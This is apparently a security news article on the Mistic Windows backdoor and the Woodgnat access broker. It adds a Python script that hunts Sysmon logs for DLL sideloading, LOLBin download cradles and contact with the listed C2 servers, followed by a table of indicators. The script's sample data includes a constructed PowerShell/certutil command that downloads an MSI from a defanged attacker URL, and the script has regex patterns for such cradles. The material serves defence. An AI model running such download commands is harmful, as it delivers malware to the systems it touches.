New Windows Backdoor Mistic Enables In-Memory Code Execution and Credential Theft

Source: Cybersecurity News (cybersecuritynews.com), by Blog Writer


A newly identified Windows backdoor called Mistic has been quietly circulating in enterprise networks since April 2026, giving attackers persistent, low-profile access that is built to slip past file-based detection.

The malware has been spotted targeting organizations across the insurance, education, information technology, and professional services sectors, with attackers showing opportunistic behavior rather than focusing on a single industry.

Mistic stands out from many other backdoors because of how little it leaves on disk. Operator-supplied payloads are executed entirely in memory, so the second-stage code is never written to the hard drive; what does land on disk is the loader DLL that gets the backdoor running.

That approach defeats detection tools that rely on scanning files stored on disk, which is why the loader's sideloading pattern, process behaviour and network traffic become the practical places to catch it.

Analysts at PolySwarm flagged this threat and noted it may represent an evolution in the tooling used by access brokers, specifically those who break into corporate networks and then sell that foothold to ransomware groups.

The malware has been observed operating alongside ModeloRAT, a Python-based remote access trojan previously linked to the financially motivated group tracked as Woodgnat, also known publicly as KongTuke.

According to a PolySwarm and Symantec Threat Hunter Team report shared with Cyber Security News (CSN), Mistic was deployed in intrusions where attackers used social engineering lures, including fake browser crash pages and fake CAPTCHA checks, to trick victims into running attacker-supplied PowerShell commands themselves.

These techniques are consistent with Woodgnat’s known delivery methods.

Security researchers have noted that Woodgnat appears capable of developing increasingly advanced tools as it expands its network of ransomware partners.

New Windows Backdoor Mistic

The Mistic backdoor reaches its target through DLL sideloading: a legitimate, signed Microsoft executable named MpExtMs.exe is dropped alongside a malicious DLL that carries the file name the executable expects to load, so the trusted binary loads the attacker's code in place of the real library.

The malicious DLL is named EndpointDlp.dll, borrowing the name from a genuine Microsoft endpoint security component, helping it blend seamlessly into trusted software environments.

Once active, Mistic connects to an attacker-controlled command-and-control server and waits for instructions.

It can upload and download files, create and delete folders, move or rename data, and most importantly, execute operator-supplied code directly in memory without touching the disk.

A separate credential-stealing component, delivered as a .NET DLL (listed as a fake lock screen, f.dll, in the indicators below), was also observed alongside Mistic; it presents victims with a fake lock screen that prompts for their username and password and harvests what they type.

The malware also carries a self-removal command, described as a kill switch, that lets the operator uninstall it from a compromised system on demand, significantly reducing forensic evidence and complicating post-incident investigations.

Additional tools seen in the same attack chains included PowerShell, certutil, WMIC, and curl.exe, all legitimate Windows utilities repurposed for malicious activity.

Woodgnat’s Access Broker Operations

Mistic is believed to be connected to Woodgnat, a financially motivated cybercrime group active since at least May 2024.

The group primarily operates as an initial access broker, meaning its goal is not to deploy ransomware itself, but to establish long-term access within enterprise environments and sell that access to ransomware affiliates.

Woodgnat has been publicly linked to groups including Qilin, Akira, Rhysida, Black Basta, Interlock, and 8Base.

The group typically gains a foothold by compromising WordPress websites through vulnerable plugins or stolen credentials, then injecting JavaScript that serves social engineering lures to visitors.

Over time, Woodgnat has refined these lures, shifting from ClickFix fake error pages to FileFix and then CrashFix techniques, all designed to push victims into pasting and running attacker-supplied commands.

Since April 2026, the group has also been observed using fake Microsoft Teams helpdesk chats to walk employees through these sequences.

Security researchers recommend that organizations monitor closely for DLL sideloading, especially a Microsoft-signed executable loading a DLL from its own directory in a user-writable location, or a DLL that carries a Microsoft file name but is not Microsoft-signed; Sysmon image-load events (Event ID 7) record both the loaded path and its signature status.

Defenders should also watch for abnormal use of built-in tools like curl.exe, certutil, and PowerShell (download or decode arguments, and PowerShell launched from explorer.exe after a user pastes a lure's command), and prioritize behavioral detection and memory-focused analysis over traditional signature-based controls to counter threats like Mistic effectively.
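The hunting logic those recommendations describe, written out as an added example (this is not code from the article, PolySwarm or Symantec). It assumes Sysmon events exported as JSON lines with Sysmon's standard field names (Image, ImageLoaded, Hashes, Signature, SignatureStatus, CommandLine, ParentImage, DestinationIp, QueryName); the sample events at the bottom are constructed for illustration, and the indicators are a subset of the table below, kept defanged in source and refanged only in memory:

```python
"""Hunt Sysmon JSON-lines exports for Mistic-style DLL sideloading, LOLBin cradles and C2 contact.
Added example (not code from the article, PolySwarm or Symantec). Assumes Sysmon's standard
field names: EventID 1 ProcessCreate, 3 NetworkConnect, 7 ImageLoad, 22 DnsQuery.
SAMPLE_EVENTS at the bottom are constructed for illustration, not real telemetry."""
import json
import re
from pathlib import PureWindowsPath

# Subset of the article's indicators, kept defanged in source and refanged only in memory.
IOC_SHA256 = {"1e41c7bfaa6aa3b93b6cc024274a10e33f3e12fe7c98c1db387ef8927f9d1984"}  # endpointdlp.dll
IOC_DOMAINS_DEFANGED = {"thomphon[.]com", "authorized-logins[.]net", "updater-worelos[.]com"}
IOC_IPS_DEFANGED = {"142[.]93[.]242[.]144", "198[.]13[.]159[.]44"}


def refang(value):
    """Undo the [.] / hxxp defanging used in threat-intel reports."""
    return value.replace("[.]", ".").replace("hxxp", "http")


IOC_DOMAINS = {refang(d) for d in IOC_DOMAINS_DEFANGED}
IOC_IPS = {refang(i) for i in IOC_IPS_DEFANGED}
# Where a Microsoft-signed host binary is expected to load its DLLs from, and where it should not.
TRUSTED_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\",
                "c:\\program files\\", "c:\\program files (x86)\\")
USER_WRITABLE = ("\\users\\", "\\programdata\\", "\\temp\\")
WATCHED_DLLS = {"endpointdlp.dll", "version.dll"}  # DLL names the article reports being abused
LOLBINS = {"powershell.exe", "pwsh.exe", "certutil.exe", "curl.exe", "wmic.exe"}
CRADLE_ARGS = re.compile(r"-urlcache|-decode|invoke-expression|\biex\b|downloadstring|"
                         r"frombase64string|-enc(odedcommand)?\b|process call create|https?://", re.I)


def _sha256(hashes_field):
    """Sysmon packs hashes as 'SHA256=...,MD5=...'; return the SHA-256 lower-cased."""
    parts = dict(p.split("=", 1) for p in hashes_field.split(",") if "=" in p)
    return parts.get("SHA256", "").lower()


def _ioc_domain(hostname):
    """Match the exact IoC domain or any subdomain of it (mail., php., sss. ...)."""
    host = hostname.lower().rstrip(".")
    return any(host == d or host.endswith("." + d) for d in IOC_DOMAINS)


def check_image_load(ev):
    """Event 7: known-bad hash, a Microsoft-named DLL without a valid Microsoft signature,
    or a DLL sitting next to its host executable in a user-writable directory (sideload layout)."""
    loaded, host = ev.get("ImageLoaded", "").lower(), ev.get("Image", "").lower()
    name, findings = PureWindowsPath(loaded).name, []
    if _sha256(ev.get("Hashes", "")) in IOC_SHA256:
        findings.append(f"known Mistic hash: {loaded}")
    ms_signed = ev.get("SignatureStatus") == "Valid" and "microsoft" in ev.get("Signature", "").lower()
    if name in WATCHED_DLLS and not ms_signed:
        findings.append(f"{name} loaded by {host} without a valid Microsoft signature")
    co_located = PureWindowsPath(loaded).parent == PureWindowsPath(host).parent
    if co_located and not loaded.startswith(TRUSTED_DIRS) and any(w in loaded for w in USER_WRITABLE):
        findings.append(f"sideload layout: {host} loaded {name} from its own user-writable directory")
    return findings


def check_process_create(ev):
    """Event 1: built-in tools with download/decode/execute arguments, and PowerShell spawned
    by explorer.exe, which is how a ClickFix-style Run-dialog paste shows up in telemetry."""
    image = PureWindowsPath(ev.get("Image", "").lower()).name
    parent = PureWindowsPath(ev.get("ParentImage", "").lower()).name
    cmd, findings = ev.get("CommandLine", ""), []
    if image in LOLBINS and CRADLE_ARGS.search(cmd):
        findings.append(f"{image} used as a download/execute cradle: {cmd}")
    if image in {"powershell.exe", "pwsh.exe"} and parent == "explorer.exe":
        findings.append("PowerShell spawned by explorer.exe (Run-dialog / ClickFix pattern)")
    return findings


def check_network(ev):
    """Events 3 and 22: outbound contact with, or DNS lookup of, a listed C2."""
    findings = []
    if ev.get("DestinationIp") in IOC_IPS:
        findings.append(f"C2 IP contacted: {ev['DestinationIp']}")
    for key in ("DestinationHostname", "QueryName"):
        if ev.get(key) and _ioc_domain(ev[key]):
            findings.append(f"C2 domain seen in {key}: {ev[key]}")
    return findings


HANDLERS = {1: check_process_create, 3: check_network, 7: check_image_load, 22: check_network}


def hunt(jsonl_text):
    """Run the matching handler over each JSON line; returns (EventID, finding) pairs."""
    hits = []
    for line in filter(str.strip, jsonl_text.splitlines()):
        ev = json.loads(line)
        event_id = int(ev.get("EventID", 0))
        hits.extend((event_id, f) for f in HANDLERS.get(event_id, lambda _: [])(ev))
    return hits


# Constructed sample events mirroring the chain the article describes; the lure URL stays defanged.
SAMPLE_EVENTS = "\n".join(json.dumps(e) for e in [
    {"EventID": 1, "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "ParentImage": "C:\\Windows\\explorer.exe",
     "CommandLine": "powershell -w hidden -c \"certutil -urlcache -split -f hxxp://thomphon[.]com/update.msi $env:TEMP\\u.msi\""},
    {"EventID": 7, "Image": "C:\\Users\\jdoe\\AppData\\Local\\Temp\\x\\MpExtMs.exe",
     "ImageLoaded": "C:\\Users\\jdoe\\AppData\\Local\\Temp\\x\\EndpointDlp.dll",
     "Hashes": "SHA256=1E41C7BFAA6AA3B93B6CC024274A10E33F3E12FE7C98C1DB387EF8927F9D1984",
     "Signature": "", "SignatureStatus": "Unavailable"},
    {"EventID": 7, "Image": "C:\\Windows\\System32\\notepad.exe",  # benign load, must stay quiet
     "ImageLoaded": "C:\\Windows\\System32\\version.dll", "Hashes": "SHA256=0000",
     "Signature": "Microsoft Windows", "SignatureStatus": "Valid"},
    {"EventID": 22, "Image": "C:\\Users\\jdoe\\AppData\\Local\\Temp\\x\\MpExtMs.exe",
     "QueryName": "php.authorized-logins.net"},
])

if __name__ == "__main__":
    for event_id, finding in hunt(SAMPLE_EVENTS):
        print(f"[Event {event_id}] {finding}")
```

Run against a real export, the three image-load checks are independent on purpose: the hash check only catches the samples already listed, the signature check catches a renamed or rebuilt copy of EndpointDlp.dll or version.dll, and the co-location check catches the sideloading layout itself regardless of which DLL name the next build uses. The benign notepad.exe / version.dll event in the sample set is there to confirm that a genuine, Microsoft-signed load from System32 produces no finding.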

Indicators of Compromise (IoCs)

Type        Indicator                                                           Description
SHA-256     1e41c7bfaa6aa3b93b6cc024274a10e33f3e12fe7c98c1db387ef8927f9d1984    Backdoor.Mistic — endpointdlp.dll
SHA-256     34d798a6c55e57ed0932b6499f4fbcb5454bdfca903307be101a0594b0ac07bc    Fake lock screen — f.dll
SHA-256     3f797a639bc855bc6d5471f327924b62d10900ddec49b970eca6604142bbb4be    Backdoor.Mistic — aeff97fe.msi
SHA-256     59e3c4cb06331b4f2d78a9a0592f3747e573bd01c5a7650c26361d1e25520712    Loader for backdoor — version.dll
SHA-256     8c935feec4bd05d5d918df308be417532fb42608fb989a08eab183e0ae699235    Likely privilege escalation — n.dll
SHA-256     afd5f1ed45a9867daf3bc64152cef460a06b164c8183e490db39146d4749a82c    Backdoor.Mistic — endpointdlp.dll
SHA-256     db972979d508e75fe730d3b72c2701470fbdaeaf8ebdd674744754fa44438ca5    Backdoor.Mistic — endpointdlp.dll
SHA-256     f591275a8f014b29e567529d67c54eb7bb4473db1c38737d6bfd5b3d52c9344e    Backdoor.Mistic — 48b47c0.msi
SHA-256     fb3630822b70bacb56aa4cec29b5a0e3e9acb3920809e70310a4003385a6d34a    Backdoor.Mistic — endpointdlp.dll
IP Address  142[.]93[.]242[.]144                                                C2 network indicator
IP Address  144[.]31[.]53[.]78                                                  C2 network indicator
IP Address  198[.]13[.]159[.]44                                                 C2 network indicator
IP Address  199[.]91[.]221[.]42                                                 C2 network indicator
Domain      authorized-logins[.]net                                             C2 domain
Domain      b6w9m2z5x8q1v3k[.]top                                               C2 domain
Domain      carrolc[.]com                                                       C2 domain
Domain      cj06y9v4xab[.]com                                                   C2 domain
Domain      cwrtwright[.]com                                                    C2 domain
Domain      defs[.]updater-worelos[.]com                                        C2 domain
Domain      ftps[.]upd-domain-goloro[.]com                                      C2 domain
Domain      grande-luna[.]top                                                   C2 domain
Domain      human-check[.]top                                                   C2 domain
Domain      mail[.]authorized-logins[.]net                                      C2 domain
Domain      mailes[.]upd-domain-goloro[.]com                                    C2 domain
Domain      mails[.]updater-worelos[.]com                                       C2 domain
Domain      mueleer[.]com                                                       C2 domain
Domain      nano[.]upscale-kolo[.]com                                           C2 domain
Domain      oeannon[.]com                                                       C2 domain
Domain      php[.]authorized-logins[.]net                                       C2 domain
Domain      rotoa-upda-lo[.]com                                                 C2 domain
Domain      sql-updater-service[.]com                                           C2 domain
Domain      sss[.]authorized-logins[.]net                                       C2 domain
Domain      thomphon[.]com                                                      C2 domain
Domain      upd-domain-goloro[.]com                                             C2 domain
Domain      update[.]update-fall[.]com                                          C2 domain
Domain      updater-worelos[.]com                                               C2 domain
Domain      upscale-kolo[.]com                                                  C2 domain
Domain      w3xasv14culvnqj[.]top                                               C2 domain
URL         hxxp://thomphon[.]com/update.msi                                    Malware delivery URL

Note: IP addresses and domains are intentionally defanged (e.g., [.]) to prevent accidental resolution or hyperlinking. Re-fang only within controlled threat intelligence platforms such as MISP, VirusTotal, or your SIEM.
